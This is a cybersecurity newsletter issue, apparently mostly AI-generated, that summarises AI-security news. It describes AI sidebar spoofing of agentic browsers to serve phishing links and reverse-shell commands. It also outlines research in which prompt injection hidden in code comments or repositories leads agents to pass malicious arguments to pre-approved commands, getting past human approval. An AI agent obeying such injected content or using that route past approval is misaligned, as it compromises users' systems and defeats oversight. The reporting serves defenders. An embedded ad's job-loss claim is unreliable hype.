PRESENTED BY

Cyber AI Chronicle
By Simon Ganiere · 24th October 2025
Welcome Back
Agentic browsers like OpenAI's Atlas and Perplexity's Comet are facing a sophisticated new threat that exploits the one thing users trust most—the AI interface itself.
Through malicious browser extensions that create pixel-perfect replicas of legitimate AI sidebars, attackers can now manipulate responses, serve phishing links, and even trick users into executing system-compromising commands. Could this shift from code exploitation to interface manipulation represent the next major battleground in AI security?
In today's AI recap:
AI Browsers Under Siege
What you need to know: Security researchers have demonstrated a new attack, AI Sidebar Spoofing, that allows attackers to hijack agentic browsers like OpenAI's Atlas and Perplexity's Comet through malicious extensions.
Why is it relevant?:
The attack uses a malicious browser extension to inject a pixel-perfect replica of the trusted AI sidebar, making it nearly impossible for users to spot the fake interface.
Once a user interacts with the fake sidebar, the attacker can manipulate the AI's responses to serve phishing links, trick users into granting malicious OAuth permissions, or even guide them into executing commands that install a reverse shell.
While vendors promote their products' built-in safeguards, this attack bypasses them by relying on social engineering to get the user to install the extension, highlighting a critical new threat vector for all AI-integrated browsers.
Bottom line: This new threat shifts the attack surface from exploiting code to manipulating the trusted AI interface itself. Security teams must now account for attacks that weaponize the user's trust in AI agents through sophisticated social engineering.
From Prompt to Pwned
What you need to know: Security researchers at Trail of Bits demonstrated how prompt injection attacks against AI agents can escalate to achieve remote code execution (RCE), turning a simple chat manipulation into a full system compromise.
Why is it relevant?:
The exploit works through argument injection attacks, where malicious parameters are passed to pre-approved “safe” system commands like
gitorgrep, tricking the agent into executing harmful operations.This technique cleverly bypasses the human-in-the-loop approval step that many agents rely on for running sensitive commands, making it a particularly stealthy attack vector.
The attack surface is broader than just direct user input, as malicious prompts can be hidden in code comments, log files, or public repositories that an agent might process as untrusted content.
Bottom line: This research highlights that securing AI agents requires more than just prompt filtering. Developers must shift focus to fundamental security controls like sandboxing and isolating agent operations from the host system.
Go from AI overwhelmed to AI savvy professional
AI will eliminate 300 million jobs in the next 5 years.
Yours doesn't have to be one of them.
Here's how to future-proof your career:
Join the Superhuman AI newsletter - read by 1M+ professionals
Learn AI skills in 3 mins a day
Become the AI expert on your team
GCHQ Warns of AI-Fueled Cyber Threats
What you need to know: The director of the UK's GCHQ intelligence agency warns that Britain faces its most complex threat landscape in three decades. Director Anne Keast-Butler revealed that significant cyberattacks have quadrupled over the past year, a surge fueled by nation-state actors and the rapid weaponization of artificial intelligence.
Why is it relevant?:
The sheer volume of threats is climbing, with GCHQ's National Cyber Security Center now handling four significant incidents a week, a fourfold increase compared to the previous year.
GCHQ is also using AI defensively, focusing on boosting analyst productivity, embedding secure-by-design principles in new AI systems, and understanding how adversaries are exploiting the technology.
The agency is pushing for board-level accountability, citing massive real-world consequences like the recent Jaguar Land Rover attack, which cost the UK economy an estimated $2.5 billion.
Bottom line: The message from GCHQ is clear: AI is accelerating the cat-and-mouse game of cybersecurity for both attackers and defenders. Proactive leadership and robust contingency planning are no longer optional for navigating this new era of digital threats.
The Billion-Dollar AI Identity Crisis
What you need to know: Startup Keycard has emerged from stealth with $38 million in funding to build an identity and access management (IAM) platform for autonomous AI agents.
Why is it relevant?:
As companies rapidly adopt AI, they create a new security blind spot with autonomous agents that often operate with inherited credentials, no clear owner, and excessive permissions.
Keycard tackles this by using cryptography to prove each agent’s identity and ownership, replacing static API keys with dynamic, task-scoped tokens that enforce access controls at runtime.
The funding, with rounds led by Andreessen Horowitz and Acrew Capital, signals strong investor confidence that securing AI agent identity is a critical and urgent challenge for the enterprise.
Bottom line: Managing non-human identity is shifting from a background task to a core security function for any organization deploying AI agents. These new guardrails are essential for building the trust needed to unlock the potential of a true agent-driven economy.
The Shortlist
Verizon reported that 85% of organizations are seeing a surge in mobile attacks, with over three-quarters believing that AI-assisted threats like smishing and deepfakes are likely to succeed.
Pentera introduced Resolve, a new AI-powered product that automates remediation workflows by turning validated security findings into structured tasks and routing them to the responsible teams.
Meta launched new on-device AI tools for WhatsApp and Messenger that warn users about screen sharing with unknown contacts and alert them to potentially suspicious messages to combat scams.
AI Influence Level
Level 4 - Al Created, Human Basic Idea / The whole newsletter is generated via a n8n workflow based on publicly available RSS feeds. Human-in-the-loop to review the selected articles and subjects.
Reference: AI Influence Level from Daniel Miessler
Till next time!
Project Overwatch is a cutting-edge newsletter at the intersection of cybersecurity, AI, technology, and resilience, designed to navigate the complexities of our rapidly evolving digital landscape. It delivers insightful analysis and actionable intelligence, empowering you to stay ahead in a world where staying informed is not just an option, but a necessity.
